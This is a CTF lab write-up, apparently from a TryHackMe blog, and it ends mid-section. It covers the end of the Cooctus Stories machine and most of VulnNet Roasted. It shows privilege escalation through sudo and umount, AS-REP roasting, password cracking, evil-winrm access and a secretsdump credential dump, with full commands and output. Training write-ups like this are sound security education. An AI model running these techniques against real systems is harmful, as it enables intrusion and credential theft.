drwx------ 2 szymex szymex 4096 Jan  2 09:27 .cache/
drwx------ 3 szymex szymex 4096 Jan  2 21:44 .gnupg/
drwxrwxr-x 3 szymex szymex 4096 Jan  2 10:59 .local/
-r-------- 1 szymex szymex   11 Jan  2 14:18 mysupersecretpassword.cat
-rw-rw-r-- 1 szymex szymex  316 Feb 20 20:31 note_to_para
-rwxrwxr-- 1 szymex szymex  735 Feb 20 20:30 SniffingCat.py*
-rw------- 1 szymex szymex   38 Feb 22 18:45 user.txt
szymex@cchq:~$ cat user.txt 
THM{c89f9f4ef264e22001f9a9c3d72992ef}

Szymex’s flag: THM{c89f9f4ef264e22001f9a9c3d72992ef}

Find out what Tux is working on

Hint: Combine and crack

First fragment

From the note left in the home folder, we understand that we have to collect 3 fragments:

szymex@cchq:/home/tux$ cat note_to_every_cooctus 
Hello fellow Cooctus Clan members

I'm proposing my idea to dedicate a portion of the cooctus fund for the construction of a penguin army.

The 1st Tuxling Infantry will provide young and brave penguins with opportunities to
explore the world while making sure our control over every continent spreads accordingly.

Potential candidates will be chosen from a select few who successfully complete all 3 Tuxling Trials.
Work on the challenges is already underway thanks to the trio of my top-most explorers.

Required budget: 2,348,123 Doge coins and 47 pennies.

Hope this message finds all of you well and spiky.

- TuxTheXplorer

The first fragment can be found in the nootcode.c program. Compiling the program won’t help, but we see replacements to make, from the define statements:

szymex@cchq:/home/tux/tuxling_1$ cat nootcode.c 
#include 

#define noot int
#define Noot main
#define nOot return
#define noOt (
#define nooT )
#define NOOOT "f96"
#define NooT ;
#define Nooot nuut
#define NOot {
#define nooot key
#define NoOt }
#define NOOt void
#define NOOT "NOOT!\n"
#define nooOT "050a"
#define noOT printf
#define nOOT 0
#define nOoOoT "What does the penguin say?\n"
#define nout "d61"

noot Noot noOt nooT NOot
    noOT noOt nOoOoT nooT NooT
    Nooot noOt nooT NooT

    nOot nOOT NooT
NoOt

NOOt nooot noOt nooT NOot
    noOT noOt NOOOT nooOT nout nooT NooT
NoOt

NOOt Nooot noOt nooT NOot
    noOT noOt NOOT nooT NooT
NoOt

Let’s use sed to make these replacements quickly:

szymex@cchq:/home/tux/tuxling_1$ cat nootcode.c \
> | sed 's/noot/int/g' \
> | sed 's/Noot/main/g' \
> | sed 's/nOot/return/g' \
> | sed 's/noOt/(/g' \
> | sed 's/nooT/)/g' \
> | sed 's/NOOOT/"f96"/g' \
> | sed 's/NooT/;/g' \
> | sed 's/Nooot/nuut/g' \
> | sed 's/NOot/{/g' \
> | sed 's/nooot/key/g' \
> | sed 's/NoOt/}/g' \
> | sed 's/NOOt/void/g' \
> | sed 's/NOOT/"NOOT!\n"/g' \
> | sed 's/nooOT/"050a"/g' \
> | sed 's/noOT/printf/g' \
> | sed 's/nOOT/0/g' \
> | sed 's/nOoOoT/"What does the penguin say?\n"/g' \
> | sed 's/nout/"d61"/g'
#include 

#define int int
#define main main
#define return return
#define ( (
#define ) )
#define "f96" "f96"
#define ; ;
#define nuut nuut
#define { {
#define key key
#define } }
#define void void
#define "NOOT!
" ""NOOT!
"!\n"
#define "050a" "050a"
#define printf printf
#define 0 0
#define "What does the penguin say?
" "What does the penguin say?\n"
#define "d61" "d61"

int main ( ) {
    printf ( "What does the penguin say?
" ) ;
    nuut ( ) ;

    return 0 ;
}

void key ( ) {
    printf ( "f96" "050a" "d61" ) ; <------------------ first fragment
}

void nuut ( ) {
    printf ( "NOOT!
" ) ;
}

First fragment: f96050ad61

Second fragment

Based on the name of the directory where we found the 1st fragment, we can search for other folders with the same name structure:

szymex@cchq:/home/tux$ find / -type d -name "tuxling*" 2>/dev/null
/home/tux/tuxling_3
/home/tux/tuxling_1
/media/tuxling_2

The second fragment is in a PGP crypted file:

szymex@cchq:/media/tuxling_2$ cat note 
Noot noot! You found me. 
I'm Rico and this is my challenge for you.

General Tux handed me a fragment of his secret key for safekeeping.
I've encrypted it with Penguin Grade Protection (PGP).

You can have the key fragment if you can decrypt it.

Good luck and keep on nooting!

szymex@cchq:/media/tuxling_2$ ll
total 20
drwxrwx--- 2 tux  testers 4096 Feb 20 20:02 ./
drwxr-xr-x 3 root root    4096 Feb 20 21:04 ../
-rw-rw-r-- 1 tux  testers  740 Feb 20 20:00 fragment.asc
-rw-rw---- 1 tux  testers  280 Jan  2 20:20 note
-rw-rw-r-- 1 tux  testers 3670 Feb 20 20:01 private.key

To decrypt the message, let’s import the private key.

szymex@cchq:/media/tuxling_2$ gpg --import private.key 
gpg: key B70EB31F8EF3187C: public key "TuxPingu" imported
gpg: key B70EB31F8EF3187C: secret key imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
szymex@cchq:/media/tuxling_2$ gpg --decrypt fragment.asc 
gpg: encrypted with 3072-bit RSA key, ID 97D48EB17511A6FA, created 2021-02-20
      "TuxPingu"
The second key fragment is: 6eaf62818d

Second fragment: 6eaf62818d

Third fragment

The 3rd and last fragment was in a hidden directory in tux’s home:

szymex@cchq:/home/tux$ cat tuxling_3/note 
Hi! Kowalski here. 
I was practicing my act of disappearance so good job finding me.

Here take this,
The last fragment is: 637b56db1552

Combine them all and visit the station.

Crack fragments hash

All fragments join the following hash: f96050ad616eaf62818d637b56db1552

Using crackstation, we find that the password is tuxykitty.

Tux’s flag

$ sshpass -p "tuxykitty" ssh tux@10.10.94.63
tux@cchq:~$ cat user.txt 
THM{592d07d6c2b7b3b3e7dc36ea2edbd6f1}

Tux’s flag: THM{592d07d6c2b7b3b3e7dc36ea2edbd6f1}

Find out what Varg is working on

Hint: Boot sequence initiated…

tux can run the CooctOS.py program as varg without password:

tux@cchq:~$ cd /home/varg/
tux@cchq:/home/varg$ ll
total 48
drwxr-xr-x  7 varg varg      4096 Feb 20 22:06 ./
drwxr-xr-x  6 root root      4096 Jan  2 10:24 ../
lrwxrwxrwx  1 varg varg         9 Feb 20 14:54 .bash_history -> /dev/null
-rw-r--r--  1 varg varg       220 Jan  2 10:24 .bash_logout
-rw-r--r--  1 varg varg      3771 Jan  3 11:40 .bashrc
drwx------  2 varg varg      4096 Jan  3 12:53 .cache/
-rwsrws--x  1 varg varg      2146 Feb 20 22:05 CooctOS.py*
drwxrwx--- 11 varg os_tester 4096 Feb 20 15:44 cooctOS_src/
-rw-rw-r--  1 varg varg        47 Feb 20 15:46 .gitconfig
drwx------  3 varg varg      4096 Jan  3 12:53 .gnupg/
drwxrwxr-x  3 varg varg      4096 Jan  3 10:22 .local/
drwx------  2 varg varg      4096 Feb 20 14:17 .ssh/
-rw-------  1 varg varg        38 Feb 20 21:08 user.txt
tux@cchq:/home/varg$ sudo -l
Matching Defaults entries for tux on cchq:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tux may run the following commands on cchq:
    (varg) NOPASSWD: /home/varg/CooctOS.py

We can’t read the python script, but there is a .git repository in the cooctOS_src folder. Running git show reveals the source of the program and discloses new credentials:

tux@cchq:/home/varg$ cd cooctOS_src/
tux@cchq:/home/varg/cooctOS_src$ ll
total 44
drwxrwx--- 11 varg os_tester 4096 Feb 20 15:44 ./
drwxr-xr-x  7 varg varg      4096 Feb 20 22:06 ../
drwxrwx---  2 varg os_tester 4096 Feb 20 15:46 bin/
drwxrwx---  4 varg os_tester 4096 Feb 20 15:22 boot/
drwxrwx---  2 varg os_tester 4096 Feb 20 15:10 etc/
drwxrwx---  2 varg os_tester 4096 Feb 20 15:41 games/
drwxrwxr-x  8 varg os_tester 4096 Feb 20 15:47 .git/
drwxrwx---  3 varg os_tester 4096 Feb 20 14:44 lib/
drwxrwx--- 16 varg os_tester 4096 Feb 20 15:21 run/
drwxrwx---  2 varg os_tester 4096 Feb 20 09:11 tmp/
drwxrwx--- 11 varg os_tester 4096 Feb 20 15:20 var/
tux@cchq:/home/varg/cooctOS_src$ git show
commit 8b8daa41120535c569d0b99c6859a1699227d086 (HEAD -> master)
Author: Vargles 
Date:   Sat Feb 20 15:47:21 2021 +0000

    Removed CooctOS login script for now

diff --git a/bin/CooctOS.py b/bin/CooctOS.py
deleted file mode 100755
index 4ccfcc1..0000000
--- a/bin/CooctOS.py
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/usr/bin/python3
-
-import time
-import os;
-import pty;
-
-#print(chr(27)+ "[2J")
-logo = """\033[1;30;49m
- ██████╗ ██████╗  ██████╗  ██████╗████████╗ \033[1;37;49m██████╗ ███████╗\033[1;30;49m
-██╔════╝██╔═══██╗██╔═══██╗██╔════╝╚══██╔══╝\033[1;37;49m██╔═══██╗██╔════╝\033[1;30;49m
-██║     ██║   ██║██║   ██║██║        ██║   \033[1;37;49m██║   ██║███████╗\033[1;30;49m
-██║     ██║   ██║██║   ██║██║        ██║   \033[1;37;49m██║   ██║╚════██║\033[1;30;49m
-╚██████╗╚██████╔╝╚██████╔╝╚██████╗   ██║   \033[1;37;49m╚██████╔╝███████║\033[1;30;49m
- ╚═════╝ ╚═════╝  ╚═════╝  ╚═════╝   ╚═╝    \033[1;37;49m╚═════╝ ╚══════╝\033[1;30;49m
-"""
-print(logo)
-print("                       LOADING")
-print("[", end='')
-
-for i in range(0,60):
-    #print(chr(27)+ "[2J")
-    #print(logo)
-    #print("                       LOADING")
-    print("[", end='')
-    print("=" * i, end='')
-    print("]")
-    time.sleep(0.02)
-    print("\033[A\033[A")
-
-print("\032")
-print("\033[0;0m[ \033[92m OK  \033[0;0m] Cold boot detected. Flux Capacitor powered up")
-
-print("\033[0;0m[ \033[92m OK  \033[0;0m] Mounted Cooctus Filesystem under /opt")
-
-print("\033[0;0m[ \033[92m OK  \033[0;0m] Finished booting sequence")
-
-print("CooctOS 13.3.7 LTS cookie tty1")
-uname = input("\ncookie login: ")
-pw = input("Password: ")
-
-for i in range(0,2):
-    if pw != "slowroastpork": <------------------------------------- Credentials
-        pw = input("Password: ")
-    else:
-        if uname == "varg":
-            os.setuid(1002)
-            os.setgid(1002)
-            pty.spawn("/bin/rbash")
-            break
-        else:
-            print("Login Failed")
-            break

Lateral move (tux -> varg)

Now, we can connect as varg and read the flag.

$ sshpass -p "slowroastpork" ssh varg@10.10.94.63
varg@cchq:~$ cat user.txt 
THM{3a33063a4a8a5805d17aa411a53286e6}

Varg’s flag: THM{3a33063a4a8a5805d17aa411a53286e6}

Get full root privileges

Hint: To mount or not to mount. That is the question.

Varg can run umount as root without password. However, checking on GTFOBins doesn’t reveal any privilege escalation with umount.

varg@cchq:~$ sudo -l
Matching Defaults entries for varg on cchq:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User varg may run the following commands on cchq:
    (root) NOPASSWD: /bin/umount

Checking in the fstab file reveals that there is a mounted partition in /opt/CooctFS:

varg@cchq:~$ cat /etc/fstab
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
#                
# / was on /dev/ubuntu-vg/ubuntu-lv during curtin installation
/dev/disk/by-id/dm-uuid-LVM-mrAx163lW73D8hFDlydZU2zYDwkd7tgT28ehcZQNMmzJmc0XKYP9m3eluIT1sZGo    /   ext4    defaults    0 0
# /boot was on /dev/sda2 during curtin installation
/dev/disk/by-uuid/6885d03d-f1fb-4785-971e-2bb17a3d22e3  /boot   ext4    defaults    0 0
#/swap.img  none    swap    sw  0 0
/home/varg/cooctOS_src  /opt/CooctFS    none    defaults,bind   0 0

Unmounting the partition reveals a root folder:

varg@cchq:~$ cd /opt/CooctFS/
varg@cchq:/opt/CooctFS$ ll
total 44
drwxrwx--- 11 varg os_tester 4096 Feb 20 15:44 ./
drwxr-xr-x  3 root root      4096 Feb 20 14:30 ../
drwxrwx---  2 varg os_tester 4096 Feb 20 15:46 bin/
drwxrwx---  4 varg os_tester 4096 Feb 20 15:22 boot/
drwxrwx---  2 varg os_tester 4096 Feb 20 15:10 etc/
drwxrwx---  2 varg os_tester 4096 Feb 20 15:41 games/
drwxrwxr-x  8 varg os_tester 4096 Feb 20 15:47 .git/
drwxrwx---  3 varg os_tester 4096 Feb 20 14:44 lib/
drwxrwx--- 16 varg os_tester 4096 Feb 20 15:21 run/
drwxrwx---  2 varg os_tester 4096 Feb 20 09:11 tmp/
drwxrwx--- 11 varg os_tester 4096 Feb 20 15:20 var/
varg@cchq:/opt/CooctFS$ cd
varg@cchq:~$ sudo /bin/umount /opt/CooctFS 
varg@cchq:~$ ls -la /opt/CooctFS/
total 12
drwxr-xr-x 3 root root 4096 Feb 20 09:09 .
drwxr-xr-x 3 root root 4096 Feb 20 14:30 ..
drwxr-xr-x 5 root root 4096 Feb 20 09:16 root

And there is a root.txt file there, but it’s not the root flag.

varg@cchq:~$ cat /opt/CooctFS/root/root.txt 
hmmm...
No flag here. You aren't root yet.

Root flag

That said, we can find the root SSH private key (/opt/CooctFS/root/.ssh/id_rsa). Save it locally, give it the proper permissions, and use it to connect as root:

┌──(kali㉿kali)-[/data/Cooctus_Stories/files]
└─$ chmod 400 root.key                                  
                                                                                                                     
┌──(kali㉿kali)-[/data/Cooctus_Stories/files]
└─$ ssh -i root.key root@10.10.94.63                    
root@cchq:~# cat /root/root.txt 
THM{H4CK3D_BY_C00CTUS_CL4N}

Root flag: THM{H4CK3D_BY_C00CTUS_CL4N}

TryHackMe > VulnNet Roasted

Fri, 28 May 2021 06:48:00 +0000

VulnNet Entertainment quickly deployed another management instance on their very broad network…

VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.

Difficulty: Easy
Operating System: Windows

This is a much simpler machine, do not overthink. You can do it by following common methodologies.

Note: It might take up to 6 minutes for this machine to fully boot.

Author: TheCyb3rW0lf
Discord: TheCyb3rW0lf#8594

Icon made by DinosoftLabs from www.flaticon.com

What is the user flag? (Desktop.txt)

Services

Running a full Nmap scan will reveal several running services. Our target machine is a Windows machine, and the domain name is vulnnet-rst.local.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-27 12:26:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49665/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49684/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49708/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-27T12:27:28
|_  start_date: N/A

Samba

Starting with the Samba shares, we can use smbclient to list the network shares:

┌──(kali㉿kali)-[/data/VulnNet_Roasted]
└─$ smbclient -L 10.10.100.15  
Enter WORKGROUP\kali's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    VulnNet-Business-Anonymous Disk      VulnNet Business Sharing
    VulnNet-Enterprise-Anonymous Disk      VulnNet Enterprise Sharing
SMB1 disabled -- no workgroup available

smbmap will also reveal the permissions:

┌──(kali㉿kali)-[/data/VulnNet_Roasted]
└─$ smbmap -u anonymous -H 10.10.117.62
[+] Guest session       IP: 10.10.117.62:445    Name: 10.10.117.62                                      
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    C$                                                  NO ACCESS   Default share
    IPC$                                                READ ONLY   Remote IPC
    NETLOGON                                            NO ACCESS   Logon server share 
    SYSVOL                                              NO ACCESS   Logon server share 
    VulnNet-Business-Anonymous                          READ ONLY   VulnNet Business Sharing
    VulnNet-Enterprise-Anonymous                        READ ONLY   VulnNet Enterprise Sharing

Can access the anonymous shares (VulnNet-Business-Anonymous and VulnNet-Enterprise-Anonymous) but they do not host any useful files.

Find users

As we have a read access to IPC$ without authentication, we are able to list the domain users as anonymous:

┌──(kali㉿kali)-[/data/VulnNet_Roasted]
└─$ python3 /usr/share/doc/python3-impacket/examples/lookupsid.py anonymous@10.10.117.62 | tee users.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.117.62
[*] StringBinding ncacn_np:10.10.117.62[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Find users without Kerberos pre-authentication

Isolate users (SidTypeUser)

┌──(kali㉿kali)-[/data/VulnNet_Roasted]
└─$ grep SidTypeUser users.txt | awk '{print $2}' | cut -d "\\" -f2 > users.txt
                                                                                                                    
┌──(kali㉿kali)-[/data/VulnNet_Roasted]
└─$ cat users.txt 
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

Now, let’s use GetNPUsers.py to find users without Kerberos pre-authentication:

┌──(kali㉿kali)-[/data/VulnNet_Roasted/files]
└─$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py \
        -dc-ip 10.10.100.15 \ 
        -usersfile users.txt \
        -no-pass \
        vulnnet-rst.local/
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:692e76f70a8772c46ed94e73130460c8$713b0693498fdaff68642d78e713ca965e5007d5d864ca727289930783fe28f00bf79fef8126c4722d09cafc72ec60e940d31297591f67ce049030cb531ddd9c83cd37796fbf414b830a7c90fe26d2c45d6f2b624cd4413c58e3dbb77519dd69906248f8db27b1974b880a826003e562e25d9de9e4cb7cfa85c1de954761053b7d51a455530001348b46909f91f4e80bae7374071339f0920bb3e2ad95169d20f05d0cd586882facb63c058072dacb7ec8ddbcd9297331e1f6fb6d844ea7967659bee38fde4431af9f9608e9adcb38cb6e20e72bcf61c524f480b5ea2530e16dbeed2272855a61a05c03e84653aa1a3bbbd5ece06633
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

We have found t-skid’s hash. Let’s crack it:

┌──(kali㉿kali)-[/data/VulnNet_Roasted/files]
└─$ /data/src/john/run/john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tj072889*        ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)
1g 0:00:00:04 DONE (2021-05-27 19:51) 0.2118g/s 673410p/s 673410c/s 673410C/s tj3929..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed

User: t-skid
Password: tj072889*

Samba authenticated access (`t-skid`)

Using these credentials, we are now able to connect to the NETLOGON Samba network share:

┌──(kali㉿kali)-[/data/VulnNet_Roasted]
└─$ smbclient -U vulnnet-rst.local/t-skid //10.10.100.15/NETLOGON                                             130 ⨯
Enter VULNNET-RST.LOCAL\t-skid's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Mar 17 00:15:49 2021
  ..                                  D        0  Wed Mar 17 00:15:49 2021
  ResetPassword.vbs                   A     2821  Wed Mar 17 00:18:14 2021

        8540159 blocks of size 4096. 4318542 blocks available
smb: \> get ResetPassword.vbs -
Option Explicit

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat" <------------------------------------------ interesting
strPassword = "bNdKVkjv3RR9ht" <---------------------------------------- interesting

' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")

' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)

' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")

' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "Password NOT reset for " &vbCrLf & strUserNTName
    Wscript.Echo "Password " & strPassword & " may not be allowed, or"
    Wscript.Echo "this client may not support a SSL connection."
    Wscript.Echo "Program aborted"
    Wscript.Quit
Else
    objUser.AccountDisabled = False
    objUser.Put "pwdLastSet", 0
    Err.Clear
    objUser.SetInfo
    If (Err.Number <> 0) Then
        On Error GoTo 0
        Wscript.Echo "Password reset for " & strUserNTName
        Wscript.Echo "But, unable to enable account or expire password"
        Wscript.Quit
    End If
End If
On Error GoTo 0

Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTNamegetting file \ResetPassword.vbs of size 2821 as - (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

Credentials are disclosed in the VBS script:

User: a-whitehat
Password: bNdKVkjv3RR9ht

User flag

Let’s now use evil-winrm to connect using the credentials found above.

┌──(kali㉿kali)-[/data/VulnNet_Roasted]
└─$ evil-winrm -i 10.10.100.15 -u a-whitehat -p "bNdKVkjv3RR9ht"

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\a-whitehat\Documents> cd \Users
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/27/2021  10:47 PM                a-whitehat
d-----        3/13/2021   3:20 PM                Administrator
d-----        3/13/2021   3:42 PM                enterprise-core-vn
d-r---        3/11/2021   7:36 AM                Public


*Evil-WinRM* PS C:\Users> cd enterprise-core-vn\Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> cat user.txt
THM{726b7c0baaac1455d05c827b5561f4ed}

User flag: THM{726b7c0baaac1455d05c827b5561f4ed}

What is the system flag? (Desktop.txt)

Dump hashes

Let’s use secretsdump.py to dump the hashes, using the credentials found.

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ python3 secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.10.100.15                             1 ⨯
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VULNNET-RST\WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:e15c59ee8e198aca3629e33c3e97f37827faaab34f475c83b76ffa53f83d58e7
VULNNET-RST\WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:de131f2343b586e21ba7f0867671f397
VULNNET-RST\WIN-2BO8M1OE1M1$:des-cbc-md5:8ad94f8613101694
VULNNET-RST\WIN-2BO8M1OE1M1$:plain_password_hex:5c51fad41849d3187783c78cc334ff666a46a49248a10e81a894e0bf6e20219d775cc61d35e34d0ff6a6bb3a378026bfcdc979abc624d19b78b8f448ec263757628eb786b3d47a2e638ea70f99c9898237d12750541632540fe3b82507e7ae542e43b1f20e1ccb473af2abf1bd15b8a7990bb4c6250e1e85b12522ae9a0ba0cc04d5d8e4932eb366f6be58e84974cc817f2265e85dcfdd65a887d882cea77e22edb84e47523e11245605eb1ff867c68e966022b5918e1253e6b8908e5e25527dc8d0dfe12ffc83fe7ed3fa4216b13aff427b6e51984b6abc3960e3e353f1e0345dec4ae1b9fcceb64842dc310a20c983
VULNNET-RST\WIN-2BO8M1OE1M1$:aad3b435b51404eeaad3b435b51404ee:875ff956b083d37e2e80d256e36deece:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x20809b3917494a0d3d5de6d6680c00dd718b1419
dpapi_userkey:0xbf8cce326ad7bdbb9bbd717c970b7400696d3855
[*] NL$KM 
 0000   F3 F6 6B 8D 1E 2A F4 8E  85 F6 7A 46 D1 25 A0 D3   ..k..*....zF.%..
 0010   EA F4 90 7D 2D CB A5 8C  88 C5 68 4C 1E D3 67 3B   ...}-.....hL..g;
 0020   DB 31 D9 91 C9 BB 6A 57  EA 18 2C 90 D3 06 F8 31   .1....jW..,....1
 0030   7C 8C 31 96 5E 53 5B 85  60 B4 D5 6B 47 61 85 4A   |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a

[REDACTED]

System flag

Now that we have the administrator’s hash, we can use it to connect and get the sytem flag:

